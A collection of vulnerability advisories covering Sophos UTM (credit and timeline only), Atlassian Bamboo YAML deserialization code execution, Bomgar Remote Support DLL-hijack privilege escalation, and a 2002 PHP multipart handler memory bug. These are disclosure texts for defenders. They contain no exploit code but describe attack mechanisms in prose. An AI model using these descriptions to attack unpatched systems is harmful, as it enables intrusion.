5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue has been remediated in release 9.503 for UTM. 2017.10.24 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

October 2017 - Bamboo - Critical Security Advisory

This email refers to the advisory found at https://confluence.atlassian.com/x/EZ-1Nw . CVE ID: * CVE-2017-9514. Product: Bamboo. Affected Bamboo product versions: 6.0.0 <= version < 6.0.5 6.1.0 <= version < 6.1.4 6.2.0 <= version < 6.2.1 Fixed Bamboo product versions: * for 6.0.x, Bamboo 6.0.5 has been released with a fix for this issue. * for 6.1.x, Bamboo 6.1.4 has been released with a fix for this issue. * for 6.2.x, Bamboo 6.2.1 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability that was introduced in version 6.0.0 of Bamboo. Versions of Bamboo starting with 6.0.0 before 6.0.5 (the fixed version for 6.0.x) and from 6.1.0 before 6.1.4 (the fixed version for 6.1.x) are affected by this vulnerability. Cloud instances aren't affected by the issue described in this email. Customers who have upgraded Bamboo to version 6.0.5 or 6.1.4 or 6.2.1 are not affected. Customers who have downloaded and installed Bamboo >= 6.0.0 but less than 6.0.5 (the fixed version for 6.0.x) or who have downloaded and installed Bamboo >= 6.1.0 but less than 6.1.4 (the fixed version for 6.1.x) or who have downloaded and installed Bamboo >= 6.2.0 but less than 6.2.1 (the fixed version for 6.2.x) please upgrade your Bamboo installations immediately to fix this vulnerability. Remote Code Execution (CVE-2017-8907) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Bamboo has a resource which accepts a YAML file and did not sufficiently restrict which classes could be loaded. An attacker who can login to Bamboo as a user is able to use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of Bamboo. Versions of Bamboo starting with 6.0.0 before 6.0.5 (the fixed version for 6.0.x) and from 6.1.0 before 6.1.4 (the fixed version for 6.1.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/BAM-18735 . Fix: To address this issue, we've released the following versions containing a fix: * Bamboo version 6.0.5 * Bamboo version 6.1.4 * Bamboo version 6.2.1 Remediation: Upgrade Bamboo to version 6.2.1 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Bamboo 6.0.x and cannot upgrade to 6.2.1, upgrade to version 6.0.5. If you are running Bamboo 6.1.x and cannot upgrade to 6.2.1, upgrade to version 6.1.4. For a full description of the latest version of Bamboo, see the release notes found at https://confluence.atlassian.com/display/BAMBOO/Bamboo+releases. You can download the latest version of Bamboo from the download centre found at https://www.atlassian.com/software/bamboo/download.

Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)

Virtual Security Research, LLC. https://www.vsecurity.com/ Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: Bomgar Remote Support - Local Privilege Escalation Release Date: 2017-10-26 Application: Bomgar Remote Support Versions: 15.2.x before 15.2.3 16.1.x before 16.1.5 16.2.x before 16.2.4 Severity: High/Medium Author: Robert Wessen Author: Mitch Kucia Vendor Status: Update Released [2] CVE Candidate: CVE-2017-5996 Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Product Description ~-----------------~ From Bomgar's website [1]: "The fastest, most secure way for experts to access and support the systems that need them." Vulnerability Overview ~--------------------~ In mid-January, VSR identified a privilege escalation vulnerability in Bomgar Remote Support application which can be used to escalate from any unprivileged user to nt authority/system on Microsoft Windows 7 systems. The vulnerability originates from an nt authority/system service being executed from a folder with excessive permissions. The exploit requires a remote support agent to log into the affected system. Vulnerability Details ~-------------------~ The Bomgar Remote Support agent enables remote support personnel to establish screen sharing, access command shell, and perform system administration tasks on machines with the agent installed. The agent, by default, creates a service as the Windows LocalSystem account and creates a folder at C:\ProgramData\bomgar-ssc-0xhhhhhhhh (where each h is a hex character). The agent is also executed from this folder, so the folder is included in the Windows dynamic library loader search path. The default permissions on the C:\ProgramData folder allow all users, even unprivileged ones, to append and write files. These permissions are inherited by sub-directories unless explicitly overridden. These permissions are not changed during the installation of the agent, so a DLL planting/hijack is possible. A Trojan horse with the same name as one of the requested, but not present libraries can be placed inside the C:\ProgramData\bomgar-ssc-0xhhhhhhhh folder since this folder is writeable by all users. When a remote support person attempts to connect to the host, the malicious library will be loaded and code can executed as nt authority/system. Versions Affected ~---------------~ The issue was originally discovered in version 16.1.1, although it likely exists since at least version 14. All testing was performed exclusively on Windows 7, however the vulnerability is suspected to be present on all supported Windows platforms. Vendor Response ~-------------~ The following timeline details Bomgar's response to the reported issue: 2017-02-05 VSR contacted Bomgar via several public email addresses to file a security report. 2017-02-06 Bomgar replied, VSR provided additional details on the vulnerability and Bomgar began internal triage. 2017-02-13 Bomgar confirmed reproduction and indicated a hotfix will be available to select customers on 2017-02-17. Patch for all customers will be available at a later date. 2017-03-28 Bomgar releases patch in Remote Support versions 15.2.3 [2], 16.1.5 [3], and 16.2.4 [4]. 2017-10-26 VSR advisory released. Recommendation ~------------~ Upgrade all client installs to the latest version of Bomgar Remote Support software as soon as possible. Common Vulnerabilities and Exposures (CVE) Information ~----------------------------------------------------~ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2017-5996 to this issue. This is a candidate for inclusion in the CVE list (https://cve.mitre.org), which standardizes names for security problems. Acknowledgments ~--------------~ Thanks to the Bomgar development team for a prompt response, confirmation, and patch. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= References: 1. https://www.bomgar.com/ 2. https://www.bomgar.com/support/changelog/remote-support-15-2-3 3. https://www.bomgar.com/support/changelog/remote-support-16-1-5 4. https://www.bomgar.com/support/changelog/remote-support-1624 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. See the VSR disclosure policy for more information on our responsible disclosure practices: https://www.vsecurity.com/company/disclosure =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Copyright 2017 Virtual Security Research, LLC. All rights reserved.

[VulnWatch] Advisory 02/2002: PHP remote vulnerability

e-matters GmbH www.e-matters.de -= Security Advisory =- Advisory: Remote Compromise/DOS Vulnerability in PHP Release Date: 2002/07/22 Last Modified: 2002/07/22 Author: Stefan Esser [s.esser@e-matters.de] Application: PHP 4.2.0, 4.2.1 Severity: A vulnerability within the multipart/form-data handler could allow remote compromise of the web server. Risk: Critical Vendor Status: Patches Released. Reference: http://security.e-matters.de/advisories/022002.html Overview: We have discovered a serious vulnerability within the default version of PHP. Depending on the processor architecture it may be possible for a remote attacker to either crash or compromise the web server. Details: PHP 4.2.0 introduced a completely rewritten multipart/form-data POST handler. While I was working on the code in my role as PHP developer i found a bug within the way the mime headers are processed. A malformed POST request can trigger an error condition, that is not correctly handled. Due to this bug it could happen that an uninit- ialised struct gets appended to the linked list of mime headers. When the lists gets cleaned or destroyed PHP tries to free the pointers that are expected in the struct. Because of the lack of initialisation those pointers contain stuff that was left on the stack by previous function calls. On the IA32 architecture (aka. x86) it is not possible to control what will end up in the uninitialised struct because of the stack layout. All possible code paths leave illegal addresses within the struct and PHP will crash when it tries to free them. Unfortunately the situation is absolutely different if you look on a solaris sparc installation. Here it is possible for an attacker to free chunks of memory that are full under his control. This is most probably the case for several more non IA32 architectures. Please note that exploitability is not only limited to systems that are running malloc()/free() implementations that are known to be vulnerable to control structure overwrites. This is because the internal PHP memory managment implements its own linked list system that can be used to overwrite nearly arbitrary memory addresses. Proof of Concept: e-matters is not going to release the exploit for this vulnerability to the public. Vendor Response: 22th July 2002 - An updated version of PHP which fixes this vulnerability was released and can be downloaded at: http://www.php.net/downloads.php The vendor announcement is available at: http://www.php.net/release_4_2_2.php Recommendation: If you are running PHP 4.2.x you should upgrade as soon as possible, especially if your server runs on a non IA32 CPU. If you cannot upgrade for whatever reason the only way to workaround this, is to disable all kinds of POST requests on your server. GPG-Key: http://security.e-matters.de/gpg_key.asc pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6 Copyright 2002 Stefan Esser. All rights reserved.